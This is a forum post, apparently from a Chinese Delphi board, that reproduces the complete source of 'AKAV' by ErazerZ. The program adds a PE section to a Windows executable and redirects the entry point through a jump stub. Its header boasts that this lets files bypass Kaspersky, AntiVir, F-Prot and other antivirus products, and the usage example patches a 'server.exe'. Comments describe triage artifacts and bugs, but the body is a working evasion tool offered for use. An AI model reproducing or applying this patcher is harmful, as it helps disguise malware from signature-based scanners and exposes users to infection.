HanDs
管理员

[Delphi文章] 添加新节 



给 PE 文件添加一个新节,并把入口点移到该节,效果类似于"加花"(在入口处加入花指令)。按源码注释的说法,这种入口点移动只影响依赖入口点特征码的检测;作者本人也建议改用带启发式检测的杀毒软件。

{  
 
[Anti]KAV Unit by ErazerZ  
5th January 2006  
Web: http://www.gateofgod.com  
E-Mail: [email protected]  
 
This program bypass: KAV, AntiVir, F-Prot, and some other AVs ...  
Mostly users still think KAV is still best AV, but times changed, i made this  
Application to show users that KAV became (or was always) very bad.  
A simple EntryPoint move can make a Application undetected. That isnt secure  
anymore, people should better begin to use AVs with Heuristics like NOD32, VBA32,  
BitDefender and make their PCs more secure. ;)  
 
THIS IS A OPENSOURCE PROJECT, LEARN FROM IT OR DIE TRYIN :)  
 
}  
  
program AKAV;   
  
{$APPTYPE CONSOLE}  
  
uses  
Windows;   
  
{ AddSection: appends one section to the PE file FileName and redirects the
  entry point to it.

  Steps visible in the body: read the DOS header, the NT headers and the last
  section header; write a new section header directly after the last one; set
  AddressOfEntryPoint to the new section's RVA; grow SizeOfImage by $200; append
  $200 bytes starting at SectionCode to the end of the file.

  FileName    - path of the file that is modified in place.
  SectionName - name for the new section; '.EDI' is used when it is empty.
  Result      - True only if every ReadFile/WriteFile transferred the expected
                number of bytes.

  Artifacts a patched file carries (useful for triage and static rules):
  - AddressOfEntryPoint points into the last section;
  - that section has Characteristics $E0000020, i.e. code + execute + read + write;
  - its VirtualSize is $200 and it begins with B8 <imm32> FF E0
    (MOV EAX, imm32 / JMP EAX), where imm32 = ImageBase + original entry RVA;
  - the default section name is '.EDI'. }
function AddSection(FileName: String; SectionName: String): Boolean;
const
// 7-byte stub; the 4 zero bytes are overwritten below with the original entry VA.
SectionCode: Array[0..6] of Byte = (
$B8, $00, $00, $00, $00, // MOV EAX, $00000000
$FF, $E0); // JMP EAX
var
i: ShortInt;
hFile: THandle;
DosHeader: TImageDosHeader;
NtHeaders: TImageNtHeaders;
SectionHeader, NewSection: TImageSectionHeader;
dwOldEntryPoint, dwReadBytes, dwWrittenBytes: DWORD;
begin
Result := False;
// Open the target read/write; the file is patched in place, no copy is made.
hFile := CreateFile(PChar(FileName), GENERIC_ALL, FILE_SHARE_READ or FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
// NOTE(review): CreateFile reports failure as INVALID_HANDLE_VALUE, so this test
// does not catch a failed open; in that case it is the byte-count checks on the
// reads below that leave Result at False.
if hFile = 0 then
begin
CloseHandle(hFile);
Exit;
end;
// Read the DOS header from offset 0. Only the byte count is checked; the code
// does not validate the 'MZ' or 'PE' signatures anywhere.
SetFilePointer(hFile, 0, nil, FILE_BEGIN);
ReadFile(hFile, DosHeader, sizeof(DosHeader), dwReadBytes, nil);
if dwReadBytes = sizeof(DosHeader) then
begin
// Read the NT headers at the offset stored in e_lfanew.
SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);
ReadFile(hFile, NtHeaders, sizeof(NtHeaders), dwReadBytes, nil);
if dwReadBytes = sizeof(NtHeaders) then
begin
// Skip forward to the last entry of the section table and read it.
// Assumes the section table follows sizeof(NtHeaders) directly - TODO confirm
// against SizeOfOptionalHeader, which is not consulted here.
SetFilePointer(hFile, sizeof(SectionHeader) * (NtHeaders.FileHeader.NumberOfSections -1), nil, FILE_CURRENT);
ReadFile(hFile, SectionHeader, sizeof(SectionHeader), dwReadBytes, nil);
if dwReadBytes = sizeof(SectionHeader) then
begin
// Default name for the added section when the caller passes none.
if SectionName = '' then
SectionName := '.EDI';
// Copies characters 1..8 of SectionName regardless of its length, so for a
// shorter name the trailing bytes of the 8-byte field are not guaranteed to be
// zero. Rules matching on the section name should not assume zero padding.
for i := 0 to 7 do
NewSection.Name[i] := Byte(SectionName[i +1]);
// Fill in the new header. NewSection is a local record and only the fields
// below are assigned; the relocation/line-number fields keep whatever the
// stack held.
// The new section is placed at the current end of the image (RVA = SizeOfImage).
NewSection.VirtualAddress := NtHeaders.OptionalHeader.SizeOfImage;
NewSection.Misc.VirtualSize := $200;
// Raw size is derived from SizeOfImage and FileAlignment rather than from the
// number of bytes actually written later ($200).
NewSection.SizeOfRawData := (NewSection.VirtualAddress div NtHeaders.OptionalHeader.FileAlignment +1) *
NtHeaders.OptionalHeader.FileAlignment - NtHeaders.OptionalHeader.SizeOfImage;
// Raw data is declared to start where the previous last section's raw data ends.
NewSection.PointerToRawData := SectionHeader.SizeOfRawData + SectionHeader.PointerToRawData;
// $E0000020 = CNT_CODE or MEM_EXECUTE or MEM_READ or MEM_WRITE.
NewSection.Characteristics := $E0000020;
Inc(NtHeaders.FileHeader.NumberOfSections);

// Write the new header at the current file position, i.e. directly after the
// last existing section header. Whatever bytes were there are overwritten; no
// check for free header space is made.
WriteFile(hFile, NewSection, sizeof(NewSection), dwWrittenBytes, nil);
if dwWrittenBytes = sizeof(NewSection) then
begin
// Remember the original entry point as an absolute address (RVA + ImageBase)
// and point the entry at the start of the new section.
dwOldEntryPoint := NtHeaders.OptionalHeader.AddressOfEntryPoint + NtHeaders.OptionalHeader.ImageBase;
NtHeaders.OptionalHeader.AddressOfEntryPoint := NewSection.VirtualAddress;
// Patch the MOV EAX immediate (byte offset 1 of the stub) with that address.
// The stub therefore carries a hard-coded VA based on the header's ImageBase.
PDWORD(DWORD(@SectionCode) +1)^ := dwOldEntryPoint;
// Grow SizeOfImage by the new section's virtual size and rewrite the NT headers.
NtHeaders.OptionalHeader.SizeOfImage := NtHeaders.OptionalHeader.SizeOfImage + NewSection.Misc.VirtualSize;
SetFilePointer(hFile, DosHeader._lfanew, nil, FILE_BEGIN);
WriteFile(hFile, NtHeaders, sizeof(NtHeaders), dwWrittenBytes, nil);
if dwWrittenBytes = sizeof(NtHeaders) then
begin
// Append the section body at the end of the file. $200 bytes are written
// starting at the 7-byte SectionCode constant, so everything after the stub is
// whatever follows that constant in the tool's own memory.
SetFilePointer(hFile, GetFileSize(hFile, nil), nil, FILE_BEGIN);
WriteFile(hFile, SectionCode, NewSection.Misc.VirtualSize, dwWrittenBytes, nil);
if dwWrittenBytes = NewSection.Misc.VirtualSize then
begin
CloseHandle(hFile);
Result := True;
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end else
CloseHandle(hFile);
end;
  
begin
  // Console banner, printed on every run.
  WriteLn;
  WriteLn('A[nti]KAV by ErazerZ');
  WriteLn('5th January 2006');
  WriteLn('Web: http://www.gateofgod.com');
  WriteLn('E-Mail: [email protected]');
  WriteLn;
  if ParamStr(1) = '' then
  begin
    // No target path given: print the usage text only.
    WriteLn('Usage:' +#9#9+ 'AKAV.exe <your Application''s path> <your Section Name>');
    WriteLn('Example:' +#9+ 'AKAV.exe "c:\server.exe" ".ErazerZ"');
  end
  // First argument is the file to modify, second the optional section name;
  // the message reflects AddSection's Boolean result.
  else if AddSection(ParamStr(1), ParamStr(2)) then
    WriteLn('File is patched!')
  else
    WriteLn('Error while patching!');
end.

